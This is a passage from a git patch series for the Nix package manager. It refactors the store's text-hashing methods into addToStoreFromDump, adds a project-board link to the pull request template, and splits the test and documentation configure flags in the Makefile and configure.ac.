HashAlgorithm::SHA256, {}).first + : store->addToStoreSlow( + *namePart, accessor, path2, caMethod, HashAlgorithm::SHA256, {}).path; - ValidPathInfo info { - *store, - std::move(*namePart), - FixedOutputInfo { - .method = std::move(ingestionMethod), - .hash = std::move(hash), - .references = {}, - }, - narHash, - }; - info.narSize = sink.s.size(); - - if (!dryRun) { - auto source = StringSource(sink.s); - store->addToStore(info, source); - } - - logger->cout("%s", store->printStorePath(info.path)); + logger->cout("%s", store->printStorePath(storePath)); } }; @@ -110,7 +92,7 @@ struct CmdAddFile : CmdAddToStore { CmdAddFile() { - ingestionMethod = FileIngestionMethod::Flat; + caMethod = FileIngestionMethod::Flat; } std::string description() override diff --git a/src/nix/hash.cc b/src/nix/hash.cc index 0bba3b7d2..83694306e 100644 --- a/src/nix/hash.cc +++ b/src/nix/hash.cc @@ -5,6 +5,7 @@ #include "shared.hh" #include "references.hh" #include "archive.hh" +#include "posix-source-accessor.hh" using namespace nix; @@ -88,14 +89,8 @@ struct CmdHashBase : Command else hashSink = std::make_unique(ha); - switch (mode) { - case FileIngestionMethod::Flat: - readFile(path, *hashSink); - break; - case FileIngestionMethod::Recursive: - dumpPath(path, *hashSink); - break; - } + PosixSourceAccessor accessor; + dumpPath(accessor, CanonPath::fromCwd(path), *hashSink, mode); Hash h = hashSink->finish().first; if (truncate && h.hashSize > 20) h = compressHash(h, 20); diff --git a/src/nix/prefetch.cc b/src/nix/prefetch.cc index bbfeb8aa4..b5d619006 100644 --- a/src/nix/prefetch.cc +++ b/src/nix/prefetch.cc @@ -9,6 +9,7 @@ #include "attr-path.hh" #include "eval-inline.hh" #include "legacy.hh" +#include "posix-source-accessor.hh" #include @@ -122,7 +123,11 @@ std::tuple prefetchFile( Activity act(*logger, lvlChatty, actUnknown, fmt("adding '%s' to the store", url)); - auto info = store->addToStoreSlow(*name, tmpFile, ingestionMethod, hashAlgo, expectedHash); + PosixSourceAccessor accessor; + auto info = store->addToStoreSlow( + *name, + accessor, CanonPath::fromCwd(tmpFile), + ingestionMethod, hashAlgo, {}, expectedHash); storePath = info.path; assert(info.ca); hash = info.ca->hash; diff --git a/tests/unit/libexpr/primops.cc b/tests/unit/libexpr/primops.cc index 31b1b49ae..6d7649b3c 100644 --- a/tests/unit/libexpr/primops.cc +++ b/tests/unit/libexpr/primops.cc @@ -604,7 +604,7 @@ namespace nix { ASSERT_THAT(v, IsStringEq("401b09eab3c013d4ca54922bb802bec8fd5318192b0a75f201d8b3727429080fb337591abd3e44453b954555b7a0812e1081c39b740293f765eae731f5a65ed1")); } - TEST_F(PrimOpTest, hashStringInvalidHashType) { + TEST_F(PrimOpTest, hashStringInvalidHashAlgorithm) { ASSERT_THROW(eval("builtins.hashString \"foobar\" \"asdf\""), Error); } From ed26b186fbed9e5f8df2453a5b1aec0c18b11401 Mon Sep 17 00:00:00 2001 From: John Ericson Date: Wed, 8 Nov 2023 21:11:48 -0500 Subject: [PATCH 136/654] Remove now-redundant text-hashing store methods `addTextToStore` and `computeStorePathFromDump` are now redundant. Co-authored-by: Robert Hensing --- src/libexpr/primops.cc | 10 ++- src/libstore/binary-cache-store.cc | 71 +++++++++++---------- src/libstore/binary-cache-store.hh | 6 -- src/libstore/build/local-derivation-goal.cc | 11 ---- src/libstore/content-address.hh | 8 +-- src/libstore/daemon.cc | 5 +- src/libstore/derivations.cc | 10 ++- src/libstore/dummy-store.cc | 7 -- src/libstore/legacy-ssh-store.hh | 7 -- src/libstore/local-store.cc | 52 --------------- src/libstore/local-store.hh | 6 -- src/libstore/remote-store.cc | 10 --- src/libstore/remote-store.hh | 6 -- src/libstore/store-api.cc | 34 +++------- src/libstore/store-api.hh | 10 --- src/libstore/store-dir-config.hh | 23 ------- src/nix-env/user-env.cc | 13 ++-- src/nix/develop.cc | 6 +- 18 files changed, 83 insertions(+), 212 deletions(-) diff --git a/src/libexpr/primops.cc b/src/libexpr/primops.cc index 75ee1e38d..8b689f0c8 100644 --- a/src/libexpr/primops.cc +++ b/src/libexpr/primops.cc @@ -2072,8 +2072,14 @@ static void prim_toFile(EvalState & state, const PosIdx pos, Value * * args, Val } auto storePath = settings.readOnlyMode - ? state.store->computeStorePathForText(name, contents, refs) - : state.store->addTextToStore(name, contents, refs, state.repair); + ? state.store->makeFixedOutputPathFromCA(name, TextInfo { + .hash = hashString(HashAlgorithm::SHA256, contents), + .references = std::move(refs), + }) + : ({ + StringSource s { contents }; + state.store->addToStoreFromDump(s, name, TextIngestionMethod {}, HashAlgorithm::SHA256, refs, state.repair); + }); /* Note: we don't need to add `context' to the context of the result, since `storePath' itself has references to the paths diff --git a/src/libstore/binary-cache-store.cc b/src/libstore/binary-cache-store.cc index 19aa283fc..8a3052433 100644 --- a/src/libstore/binary-cache-store.cc +++ b/src/libstore/binary-cache-store.cc @@ -12,6 +12,7 @@ #include "thread-pool.hh" #include "callback.hh" #include "signals.hh" +#include "archive.hh" #include #include @@ -308,15 +309,47 @@ StorePath BinaryCacheStore::addToStoreFromDump( const StorePathSet & references, RepairFlag repair) { - if (method != FileIngestionMethod::Recursive || hashAlgo != HashAlgorithm::SHA256) - unsupported("addToStoreFromDump"); - return addToStoreCommon(dump, repair, CheckSigs, [&](HashResult nar) { + std::optional caHash; + std::string nar; + + if (auto * dump2p = dynamic_cast(&dump)) { + auto & dump2 = *dump2p; + // Hack, this gives us a "replayable" source so we can compute + // multiple hashes more easily. + caHash = hashString(HashAlgorithm::SHA256, dump2.s); + switch (method.getFileIngestionMethod()) { + case FileIngestionMethod::Recursive: + // The dump is already NAR in this case, just use it. + nar = dump2.s; + break; + case FileIngestionMethod::Flat: + // The dump is Flat, so we need to convert it to NAR with a + // single file. + StringSink s; + dumpString(dump2.s, s); + nar = std::move(s.s); + break; + } + } else { + // Otherwise, we have to do th same hashing as NAR so our single + // hash will suffice for both purposes. + if (method != FileIngestionMethod::Recursive || hashAlgo != HashAlgorithm::SHA256) + unsupported("addToStoreFromDump"); + } + StringSource narDump { nar }; + + // Use `narDump` if we wrote to `nar`. + Source & narDump2 = nar.size() > 0 + ? static_cast(narDump) + : dump; + + return addToStoreCommon(narDump2, repair, CheckSigs, [&](HashResult nar) { ValidPathInfo info { *this, name, ContentAddressWithReferences::fromParts( method, - nar.first, + caHash ? *caHash : nar.first, { .others = references, // caller is not capable of creating a self-reference, because this is content-addressed without modulus @@ -440,36 +473,6 @@ StorePath BinaryCacheStore::addToStore( })->path; } -StorePath BinaryCacheStore::addTextToStore( - std::string_view name, - std::string_view s, - const StorePathSet & references, - RepairFlag repair) -{ - auto textHash = hashString(HashAlgorithm::SHA256, s); - auto path = makeTextPath(name, TextInfo { { textHash }, references }); - - if (!repair && isValidPath(path)) - return path; - - StringSink sink; - dumpString(s, sink); - StringSource source(sink.s); - return addToStoreCommon(source, repair, CheckSigs, [&](HashResult nar) { - ValidPathInfo info { - *this, - std::string { name }, - TextInfo { - .hash = textHash, - .references = references, - }, - nar.first, - }; - info.narSize = nar.second; - return info; - })->path; -} - void BinaryCacheStore::queryRealisationUncached(const DrvOutput & id, Callback> callback) noexcept { diff --git a/src/libstore/binary-cache-store.hh b/src/libstore/binary-cache-store.hh index dbe4ac180..98e43ee6a 100644 --- a/src/libstore/binary-cache-store.hh +++ b/src/libstore/binary-cache-store.hh @@ -141,12 +141,6 @@ public: PathFilter & filter, RepairFlag repair) override; - StorePath addTextToStore( - std::string_view name, - std::string_view s, - const StorePathSet & references, - RepairFlag repair) override; - void registerDrvOutput(const Realisation & info) override; void queryRealisationUncached(const DrvOutput &, diff --git a/src/libstore/build/local-derivation-goal.cc b/src/libstore/build/local-derivation-goal.cc index e4828dd2f..b01d9e237 100644 --- a/src/libstore/build/local-derivation-goal.cc +++ b/src/libstore/build/local-derivation-goal.cc @@ -1308,17 +1308,6 @@ struct RestrictedStore : public virtual RestrictedStoreConfig, public virtual In goal.addDependency(info.path); } - StorePath addTextToStore( - std::string_view name, - std::string_view s, - const StorePathSet & references, - RepairFlag repair = NoRepair) override - { - auto path = next->addTextToStore(name, s, references, repair); - goal.addDependency(path); - return path; - } - StorePath addToStoreFromDump( Source & dump, std::string_view name, diff --git a/src/libstore/content-address.hh b/src/libstore/content-address.hh index 6863ad260..f0973412b 100644 --- a/src/libstore/content-address.hh +++ b/src/libstore/content-address.hh @@ -109,11 +109,11 @@ struct ContentAddressMethod * serialisation methods (flat file vs NAR). Thus, ‘ca’ has one of the * following forms: * - * - ‘text:sha256:’: For paths - * computed by Store::makeTextPath() / Store::addTextToStore(). + * - `TextIngestionMethod`: + * ‘text:sha256:’ * - * - ‘fixed:::’: For paths computed by - * Store::makeFixedOutputPath() / Store::addToStore(). + * - `FixedIngestionMethod`: + * ‘fixed:::’ */ struct ContentAddress { diff --git a/src/libstore/daemon.cc b/src/libstore/daemon.cc index 574263c68..923ea6447 100644 --- a/src/libstore/daemon.cc +++ b/src/libstore/daemon.cc @@ -483,7 +483,10 @@ static void performOp(TunnelLogger * logger, ref store, std::string s = readString(from); auto refs = WorkerProto::Serialise::read(*store, rconn); logger->startWork(); - auto path = store->addTextToStore(suffix, s, refs, NoRepair); + auto path = ({ + StringSource source { s }; + store->addToStoreFromDump(source, suffix, TextIngestionMethod {}, HashAlgorithm::SHA256, refs, NoRepair); + }); logger->stopWork(); to << store->printStorePath(path); break; diff --git a/src/libstore/derivations.cc b/src/libstore/derivations.cc index c35150b57..8a7d660ff 100644 --- a/src/libstore/derivations.cc +++ b/src/libstore/derivations.cc @@ -143,8 +143,14 @@ StorePath writeDerivation(Store & store, auto suffix = std::string(drv.name) + drvExtension; auto contents = drv.unparse(store, false); return readOnly || settings.readOnlyMode - ? store.computeStorePathForText(suffix, contents, references) - : store.addTextToStore(suffix, contents, references, repair); + ? store.makeFixedOutputPathFromCA(suffix, TextInfo { + .hash = hashString(HashAlgorithm::SHA256, contents), + .references = std::move(references), + }) + : ({ + StringSource s { contents }; + store.addToStoreFromDump(s, suffix, TextIngestionMethod {}, HashAlgorithm::SHA256, references, repair); + }); } diff --git a/src/libstore/dummy-store.cc b/src/libstore/dummy-store.cc index 821cda399..f52a309d1 100644 --- a/src/libstore/dummy-store.cc +++ b/src/libstore/dummy-store.cc @@ -58,13 +58,6 @@ struct DummyStore : public virtual DummyStoreConfig, public virtual Store RepairFlag repair, CheckSigsFlag checkSigs) override { unsupported("addToStore"); } - StorePath addTextToStore( - std::string_view name, - std::string_view s, - const StorePathSet & references, - RepairFlag repair) override - { unsupported("addTextToStore"); } - void narFromPath(const StorePath & path, Sink & sink) override { unsupported("narFromPath"); } diff --git a/src/libstore/legacy-ssh-store.hh b/src/libstore/legacy-ssh-store.hh index 8b142ba2a..c5a3ce677 100644 --- a/src/libstore/legacy-ssh-store.hh +++ b/src/libstore/legacy-ssh-store.hh @@ -69,13 +69,6 @@ struct LegacySSHStore : public virtual LegacySSHStoreConfig, public virtual Stor RepairFlag repair) override { unsupported("addToStore"); } - StorePath addTextToStore( - std::string_view name, - std::string_view s, - const StorePathSet & references, - RepairFlag repair) override - { unsupported("addTextToStore"); } - private: void putBuildSettings(Connection & conn); diff --git a/src/libstore/local-store.cc b/src/libstore/local-store.cc index cd8bf24f8..df1de7752 100644 --- a/src/libstore/local-store.cc +++ b/src/libstore/local-store.cc @@ -1257,58 +1257,6 @@ StorePath LocalStore::addToStoreFromDump( } -StorePath LocalStore::addTextToStore( - std::string_view name, - std::string_view s, - const StorePathSet & references, RepairFlag repair) -{ - auto hash = hashString(HashAlgorithm::SHA256, s); - auto dstPath = makeTextPath(name, TextInfo { - .hash = hash, - .references = references, - }); - - addTempRoot(dstPath); - - if (repair || !isValidPath(dstPath)) { - - auto realPath = Store::toRealPath(dstPath); - - PathLocks outputLock({realPath}); - - if (repair || !isValidPath(dstPath)) { - - deletePath(realPath); - - autoGC(); - - writeFile(realPath, s); - - canonicalisePathMetaData(realPath, {}); - - StringSink sink; - dumpString(s, sink); - auto narHash = hashString(HashAlgorithm::SHA256, sink.s); - - optimisePath(realPath, repair); - - ValidPathInfo info { dstPath, narHash }; - info.narSize = sink.s.size(); - info.references = references; - info.ca = { - .method = TextIngestionMethod {}, - .hash = hash, - }; - registerValidPath(info); - } - - outputLock.setDeletion(true); - } - - return dstPath; -} - - /* Create a temporary directory in the store that won't be garbage-collected until the returned FD is closed. */ std::pair LocalStore::createTempDirInStore() diff --git a/src/libstore/local-store.hh b/src/libstore/local-store.hh index a8323fe5a..ba56d3ead 100644 --- a/src/libstore/local-store.hh +++ b/src/libstore/local-store.hh @@ -185,12 +185,6 @@ public: const StorePathSet & references, RepairFlag repair) override; - StorePath addTextToStore( - std::string_view name, - std::string_view s, - const StorePathSet & references, - RepairFlag repair) override; - void addTempRoot(const StorePath & path) override; private: diff --git a/src/libstore/remote-store.cc b/src/libstore/remote-store.cc index 567776b67..4d0113594 100644 --- a/src/libstore/remote-store.cc +++ b/src/libstore/remote-store.cc @@ -608,16 +608,6 @@ void RemoteStore::addMultipleToStore( } -StorePath RemoteStore::addTextToStore( - std::string_view name, - std::string_view s, - const StorePathSet & references, - RepairFlag repair) -{ - StringSource source(s); - return addCAToStore(source, name, TextIngestionMethod {}, HashAlgorithm::SHA256, references, repair)->path; -} - void RemoteStore::registerDrvOutput(const Realisation & info) { auto conn(getConnection()); diff --git a/src/libstore/remote-store.hh b/src/libstore/remote-store.hh index 68824a737..87704985b 100644 --- a/src/libstore/remote-store.hh +++ b/src/libstore/remote-store.hh @@ -106,12 +106,6 @@ public: RepairFlag repair, CheckSigsFlag checkSigs) override; - StorePath addTextToStore( - std::string_view name, - std::string_view s, - const StorePathSet & references, - RepairFlag repair) override; - void registerDrvOutput(const Realisation & info) override; void queryRealisationUncached(const DrvOutput &, diff --git a/src/libstore/store-api.cc b/src/libstore/store-api.cc index 5b4c6c765..c2516afb5 100644 --- a/src/libstore/store-api.cc +++ b/src/libstore/store-api.cc @@ -205,25 +205,19 @@ StorePath StoreDirConfig::makeFixedOutputPath(std::string_view name, const Fixed } -StorePath StoreDirConfig::makeTextPath(std::string_view name, const TextInfo & info) const -{ - assert(info.hash.algo == HashAlgorithm::SHA256); - return makeStorePath( - makeType(*this, "text", StoreReferences { - .others = info.references, - .self = false, - }), - info.hash, - name); -} - - StorePath StoreDirConfig::makeFixedOutputPathFromCA(std::string_view name, const ContentAddressWithReferences & ca) const { // New template return std::visit(overloaded { [&](const TextInfo & ti) { - return makeTextPath(name, ti); + assert(ti.hash.algo == HashAlgorithm::SHA256); + return makeStorePath( + makeType(*this, "text", StoreReferences { + .others = ti.references, + .self = false, + }), + ti.hash, + name); }, [&](const FixedOutputInfo & foi) { return makeFixedOutputPath(name, foi); @@ -257,18 +251,6 @@ std::pair StoreDirConfig::computeStorePath( } -StorePath StoreDirConfig::computeStorePathForText( - std::string_view name, - std::string_view s, - const StorePathSet & references) const -{ - return makeTextPath(name, TextInfo { - .hash = hashString(HashAlgorithm::SHA256, s), - .references = references, - }); -} - - StorePath Store::addToStore( std::string_view name, SourceAccessor & accessor, diff --git a/src/libstore/store-api.hh b/src/libstore/store-api.hh index fc0a82a73..96a7ebd7b 100644 --- a/src/libstore/store-api.hh +++ b/src/libstore/store-api.hh @@ -468,16 +468,6 @@ public: RepairFlag repair = NoRepair) { unsupported("addToStoreFromDump"); } - /** - * Like addToStore, but the contents written to the output path is a - * regular file containing the given string. - */ - virtual StorePath addTextToStore( - std::string_view name, - std::string_view s, - const StorePathSet & references, - RepairFlag repair = NoRepair) = 0; - /** * Add a mapping indicating that `deriver!outputName` maps to the output path * `output`. diff --git a/src/libstore/store-dir-config.hh b/src/libstore/store-dir-config.hh index 0fc8ded9c..7ca8c2665 100644 --- a/src/libstore/store-dir-config.hh +++ b/src/libstore/store-dir-config.hh @@ -86,8 +86,6 @@ struct StoreDirConfig : public Config StorePath makeFixedOutputPath(std::string_view name, const FixedOutputInfo & info) const; - StorePath makeTextPath(std::string_view name, const TextInfo & info) const; - StorePath makeFixedOutputPathFromCA(std::string_view name, const ContentAddressWithReferences & ca) const; /** @@ -102,27 +100,6 @@ struct StoreDirConfig : public Config HashAlgorithm hashAlgo = HashAlgorithm::SHA256, const StorePathSet & references = {}, PathFilter & filter = defaultPathFilter) const; - - /** - * Preparatory part of addTextToStore(). - * - * !!! Computation of the path should take the references given to - * addTextToStore() into account, otherwise we have a (relatively - * minor) security hole: a caller can register a source file with - * bogus references. If there are too many references, the path may - * not be garbage collected when it has to be (not really a problem, - * the caller could create a root anyway), or it may be garbage - * collected when it shouldn't be (more serious). - * - * Hashing the references would solve this (bogus references would - * simply yield a different store path, so other users wouldn't be - * affected), but it has some backwards compatibility issues (the - * hashing scheme changes), so I'm not doing that for now. - */ - StorePath computeStorePathForText( - std::string_view name, - std::string_view s, - const StorePathSet & references) const; }; } diff --git a/src/nix-env/user-env.cc b/src/nix-env/user-env.cc index 34f6bd005..5d01fbf10 100644 --- a/src/nix-env/user-env.cc +++ b/src/nix-env/user-env.cc @@ -104,10 +104,15 @@ bool createUserEnv(EvalState & state, DrvInfos & elems, /* Also write a copy of the list of user environment elements to the store; we need it for future modifications of the environment. */ - std::ostringstream str; - manifest.print(state.symbols, str, true); - auto manifestFile = state.store->addTextToStore("env-manifest.nix", - str.str(), references); + auto manifestFile = ({ + std::ostringstream str; + manifest.print(state.symbols, str, true); + // TODO with C++20 we can use str.view() instead and avoid copy. + std::string str2 = str.str(); + StringSource source { str2 }; + state.store->addToStoreFromDump( + source, "env-manifest.nix", TextIngestionMethod {}, HashAlgorithm::SHA256, references); + }); /* Get the environment builder expression. */ Value envBuilder; diff --git a/src/nix/develop.cc b/src/nix/develop.cc index 606b044b0..8db2de491 100644 --- a/src/nix/develop.cc +++ b/src/nix/develop.cc @@ -223,7 +223,11 @@ static StorePath getDerivationEnvironment(ref store, ref evalStore if (builder != "bash") throw Error("'nix develop' only works on derivations that use 'bash' as their builder"); - auto getEnvShPath = evalStore->addTextToStore("get-env.sh", getEnvSh, {}); + auto getEnvShPath = ({ + StringSource source { getEnvSh }; + evalStore->addToStoreFromDump( + source, "get-env.sh", TextIngestionMethod {}, HashAlgorithm::SHA256, {}); + }); drv.args = {store->printStorePath(getEnvShPath)}; From b1c559eabccc8890c74f4e520b89e800f6e7ef7e Mon Sep 17 00:00:00 2001 From: tomberek Date: Mon, 18 Dec 2023 10:45:57 -0500 Subject: [PATCH 137/654] docs: add link to project board to PRs (#9630) * docs: add link to project board to PRs * Update .github/PULL_REQUEST_TEMPLATE.md Co-authored-by: Valentin Gagarin * fix wording * add note on the process --------- Co-authored-by: Valentin Gagarin --- .github/PULL_REQUEST_TEMPLATE.md | 4 +++- 1 file changed, 3 insertions(+), 1 deletion(-) diff --git a/.github/PULL_REQUEST_TEMPLATE.md b/.github/PULL_REQUEST_TEMPLATE.md index 217b19108..d12a4d36c 100644 --- a/.github/PULL_REQUEST_TEMPLATE.md +++ b/.github/PULL_REQUEST_TEMPLATE.md @@ -10,6 +10,8 @@ -# Priorities +# Priorities and Process Add :+1: to [pull requests you find important](https://github.com/NixOS/nix/pulls?q=is%3Aopen+sort%3Areactions-%2B1-desc). + +The Nix maintainer team uses a [GitHub project board](https://github.com/orgs/NixOS/projects/19) to [schedule and track reviews](https://github.com/NixOS/nix/tree/master/maintainers#project-board-protocol). From 7feabf7d44c960563350a246358d4e36bd598d60 Mon Sep 17 00:00:00 2001 From: John Ericson Date: Thu, 14 Dec 2023 00:05:03 -0500 Subject: [PATCH 138/654] Split `--disable-tests`, fix cross builds It might seem obnoxious to have yet more configure flags, but I found controlling both the unit and functional tests with one flag was quite confusing because they are so different: - unit tests depending on building, functional tests don't (e.g. when we test already-built Nix) - unit tests can be installed, functional tests cannot - unit tests neeed extra libraries (GTest, RapidCheck), functional tests need extra executables (jq). - unit tests are run by `make check`, functional tests are run by `make installcheck` Really on a technical level, they seem wholly independent. Only on a human level ("they are both are tests") do they have anything in common. I had messed up the logic in cross builds because of this. Now I split the flag in two (and cleaned up a few other inconsistencies), and the logic fixed itself. Co-Authored-By: Robert Hensing --- Makefile | 30 ++++++-- Makefile.config.in | 7 +- configure.ac | 43 ++++++++---- doc/internal-api/local.mk | 14 +--- doc/manual/local.mk | 6 +- doc/manual/src/contributing/hacking.md | 5 +- .../src/installation/prerequisites-source.md | 2 +- mk/disable-tests.mk | 12 ---- package.nix | 69 ++++++++----------- 9 files changed, 93 insertions(+), 95 deletions(-) delete mode 100644 mk/disable-tests.mk diff --git a/Makefile b/Makefile index 3dae8b394..c62216df8 100644 --- a/Makefile +++ b/Makefile @@ -24,7 +24,7 @@ makefiles = \ misc/upstart/local.mk endif -ifeq ($(ENABLE_BUILD)_$(ENABLE_TESTS), yes_yes) +ifeq ($(ENABLE_UNIT_TESTS), yes) makefiles += \ tests/unit/libutil/local.mk \ tests/unit/libutil-support/local.mk \ @@ -32,9 +32,14 @@ makefiles += \ tests/unit/libstore-support/local.mk \ tests/unit/libexpr/local.mk \ tests/unit/libexpr-support/local.mk +else +.PHONY: check +check: + @echo "Unit tests are disabled. Configure without '--disable-unit-tests', or avoid calling 'make check'." + @exit 1 endif -ifeq ($(ENABLE_TESTS), yes) +ifeq ($(ENABLE_FUNCTIONAL_TESTS), yes) makefiles += \ tests/functional/local.mk \ tests/functional/ca/local.mk \ @@ -42,8 +47,10 @@ makefiles += \ tests/functional/test-libstoreconsumer/local.mk \ tests/functional/plugins/local.mk else -makefiles += \ - mk/disable-tests.mk +.PHONY: installcheck +installcheck: + @echo "Functional tests are disabled. Configure without '--disable-functional-tests', or avoid calling 'make installcheck'." + @exit 1 endif OPTIMIZE = 1 @@ -59,9 +66,22 @@ include mk/lib.mk # Must be included after `mk/lib.mk` so rules refer to variables defined # by the library. Rules are not "lazy" like variables, unfortunately. -ifeq ($(ENABLE_BUILD), yes) +ifeq ($(ENABLE_DOC_GEN),yes) $(eval $(call include-sub-makefile, doc/manual/local.mk)) +else +.PHONY: manual-html manpages +manual-html manpages: + @echo "Generated docs are disabled. Configure without '--disable-doc-gen', or avoid calling 'make manpages' and 'make manual-html'." + @exit 1 endif + +ifeq ($(ENABLE_INTERNAL_API_DOCS),yes) $(eval $(call include-sub-makefile, doc/internal-api/local.mk)) +else +.PHONY: internal-api-html +internal-api-html: + @echo "Internal API docs are disabled. Configure with '--enable-internal-api-docs', or avoid calling 'make internal-api-html'." + @exit 1 +endif GLOBAL_CXXFLAGS += -g -Wall -include $(buildprefix)config.h -std=c++2a -I src diff --git a/Makefile.config.in b/Makefile.config.in index c85e028c2..21a9f41ec 100644 --- a/Makefile.config.in +++ b/Makefile.config.in @@ -9,8 +9,11 @@ CXXFLAGS = @CXXFLAGS@ CXXLTO = @CXXLTO@ EDITLINE_LIBS = @EDITLINE_LIBS@ ENABLE_BUILD = @ENABLE_BUILD@ +ENABLE_DOC_GEN = @ENABLE_DOC_GEN@ +ENABLE_FUNCTIONAL_TESTS = @ENABLE_FUNCTIONAL_TESTS@ +ENABLE_INTERNAL_API_DOCS = @ENABLE_INTERNAL_API_DOCS@ ENABLE_S3 = @ENABLE_S3@ -ENABLE_TESTS = @ENABLE_TESTS@ +ENABLE_UNIT_TESTS = @ENABLE_UNIT_TESTS@ GTEST_LIBS = @GTEST_LIBS@ HAVE_LIBCPUID = @HAVE_LIBCPUID@ HAVE_SECCOMP = @HAVE_SECCOMP@ @@ -36,12 +39,10 @@ checkbindir = @checkbindir@ checklibdir = @checklibdir@ datadir = @datadir@ datarootdir = @datarootdir@ -doc_generate = @doc_generate@ docdir = @docdir@ embedded_sandbox_shell = @embedded_sandbox_shell@ exec_prefix = @exec_prefix@ includedir = @includedir@ -internal_api_docs = @internal_api_docs@ libdir = @libdir@ libexecdir = @libexecdir@ localstatedir = @localstatedir@ diff --git a/configure.ac b/configure.ac index a949f9df2..1bc4f17b0 100644 --- a/configure.ac +++ b/configure.ac @@ -138,20 +138,38 @@ AC_ARG_ENABLE(build, AS_HELP_STRING([--disable-build],[Do not build nix]), ENABLE_BUILD=$enableval, ENABLE_BUILD=yes) AC_SUBST(ENABLE_BUILD) -# Building without tests is useful for bootstrapping with a smaller footprint +# Building without unit tests is useful for bootstrapping with a smaller footprint # or running the tests in a separate derivation. Otherwise, we do compile and # run them. -AC_ARG_ENABLE(tests, AS_HELP_STRING([--disable-tests],[Do not build the tests]), - ENABLE_TESTS=$enableval, ENABLE_TESTS=yes) -AC_SUBST(ENABLE_TESTS) -# Building without API docs is the default as Nix' C++ interfaces are internal and unstable. -AC_ARG_ENABLE(internal_api_docs, AS_HELP_STRING([--enable-internal-api-docs],[Build API docs for Nix's internal unstable C++ interfaces]), - internal_api_docs=$enableval, internal_api_docs=no) -AC_SUBST(internal_api_docs) +AC_ARG_ENABLE(unit-tests, AS_HELP_STRING([--disable-unit-tests],[Do not build the tests]), + ENABLE_UNIT_TESTS=$enableval, ENABLE_UNIT_TESTS=$ENABLE_BUILD) +AC_SUBST(ENABLE_UNIT_TESTS) AS_IF( - [test "$ENABLE_BUILD" == "yes" || test "$ENABLE_TEST" == "yes"], + [test "$ENABLE_BUILD" == "no" && test "$ENABLE_UNIT_TESTS" == "yes"], + [AC_MSG_ERROR([Cannot enable unit tests when building overall is disabled. Please do not pass '--enable-unit-tests' or do not pass '--disable-build'.])]) + +AC_ARG_ENABLE(functional-tests, AS_HELP_STRING([--disable-functional-tests],[Do not build the tests]), + ENABLE_FUNCTIONAL_TESTS=$enableval, ENABLE_FUNCTIONAL_TESTS=yes) +AC_SUBST(ENABLE_FUNCTIONAL_TESTS) + +# documentation generation switch +AC_ARG_ENABLE(doc-gen, AS_HELP_STRING([--disable-doc-gen],[disable documentation generation]), + ENABLE_DOC_GEN=$enableval, ENABLE_DOC_GEN=$ENABLE_BUILD) +AC_SUBST(ENABLE_DOC_GEN) + +AS_IF( + [test "$ENABLE_BUILD" == "no" && test "$ENABLE_GENERATED_DOCS" == "yes"], + [AC_MSG_ERROR([Cannot enable generated docs when building overall is disabled. Please do not pass '--enable-doc-gen' or do not pass '--disable-build'.])]) + +# Building without API docs is the default as Nix' C++ interfaces are internal and unstable. +AC_ARG_ENABLE(internal-api-docs, AS_HELP_STRING([--enable-internal-api-docs],[Build API docs for Nix's internal unstable C++ interfaces]), + ENABLE_INTERNAL_API_DOCS=$enableval, ENABLE_INTERNAL_API_DOCS=no) +AC_SUBST(ENABLE_INTERNAL_API_DOCS) + +AS_IF( + [test "$ENABLE_FUNCTIONAL_TESTS" == "yes" || test "$ENABLE_DOC_GEN" == "yes"], [NEED_PROG(jq, jq)]) AS_IF([test "$ENABLE_BUILD" == "yes"],[ @@ -317,7 +335,7 @@ if test "$gc" = yes; then AC_DEFINE(HAVE_BOEHMGC, 1, [Whether to use the Boehm garbage collector.]) fi -AS_IF([test "$ENABLE_TESTS" == "yes"],[ +AS_IF([test "$ENABLE_UNIT_TESTS" == "yes"],[ # Look for gtest. PKG_CHECK_MODULES([GTEST], [gtest_main]) @@ -349,11 +367,6 @@ AC_LANG_POP(C++) # Look for nlohmann/json. PKG_CHECK_MODULES([NLOHMANN_JSON], [nlohmann_json >= 3.9]) -# documentation generation switch -AC_ARG_ENABLE(doc-gen, AS_HELP_STRING([--disable-doc-gen],[disable documentation generation]), - doc_generate=$enableval, doc_generate=yes) -AC_SUBST(doc_generate) - # Look for lowdown library. PKG_CHECK_MODULES([LOWDOWN], [lowdown >= 0.9.0], [CXXFLAGS="$LOWDOWN_CFLAGS $CXXFLAGS"]) diff --git a/doc/internal-api/local.mk b/doc/internal-api/local.mk index 890f341b7..bf2c4dede 100644 --- a/doc/internal-api/local.mk +++ b/doc/internal-api/local.mk @@ -1,19 +1,7 @@ -.PHONY: internal-api-html - -ifeq ($(internal_api_docs), yes) - $(docdir)/internal-api/html/index.html $(docdir)/internal-api/latex: $(d)/doxygen.cfg mkdir -p $(docdir)/internal-api { cat $< ; echo "OUTPUT_DIRECTORY=$(docdir)/internal-api" ; } | doxygen - # Generate the HTML API docs for Nix's unstable internal interfaces. +.PHONY: internal-api-html internal-api-html: $(docdir)/internal-api/html/index.html - -else - -# Make a nicer error message -internal-api-html: - @echo "Internal API docs are disabled. Configure with '--enable-internal-api-docs', or avoid calling 'make internal-api-html'." - @exit 1 - -endif diff --git a/doc/manual/local.mk b/doc/manual/local.mk index 456000d3d..b77168885 100644 --- a/doc/manual/local.mk +++ b/doc/manual/local.mk @@ -1,5 +1,3 @@ -ifeq ($(doc_generate),yes) - # The version of Nix used to generate the doc. Can also be # `$(nix_INSTALL_PATH)` or just `nix` (to grap ambient from the `PATH`), # if one prefers. @@ -180,6 +178,8 @@ manual-html: $(docdir)/manual/index.html install: $(docdir)/manual/index.html # Generate 'nix' manpages. +.PHONY: manpages +manpages: $(mandir)/man1/nix3-manpages install: $(mandir)/man1/nix3-manpages man: doc/manual/generated/man1/nix3-manpages all: doc/manual/generated/man1/nix3-manpages @@ -225,5 +225,3 @@ $(docdir)/manual/index.html: $(MANUAL_SRCS) $(d)/book.toml $(d)/anchors.jq $(d)/ @rm -rf $(DESTDIR)$(docdir)/manual @mv $(DESTDIR)$(docdir)/manual.tmp/html $(DESTDIR)$(docdir)/manual @rm -rf $(DESTDIR)$(docdir)/manual.tmp - -endif diff --git a/doc/manual/src/contributing/hacking.md b/doc/manual/src/contributing/hacking.md index 421ac981c..9478c424d 100644 --- a/doc/manual/src/contributing/hacking.md +++ b/doc/manual/src/contributing/hacking.md @@ -67,9 +67,10 @@ You can also build Nix for one of the [supported platforms](#platforms). ## Makefile variables - `ENABLE_BUILD=yes` to enable building the C++ code. -- `ENABLE_TESTS=yes` to enable building the tests. +- `ENABLE_DOC_GEN=yes` to enable building the documentation (manual, man pages, etc.). +- 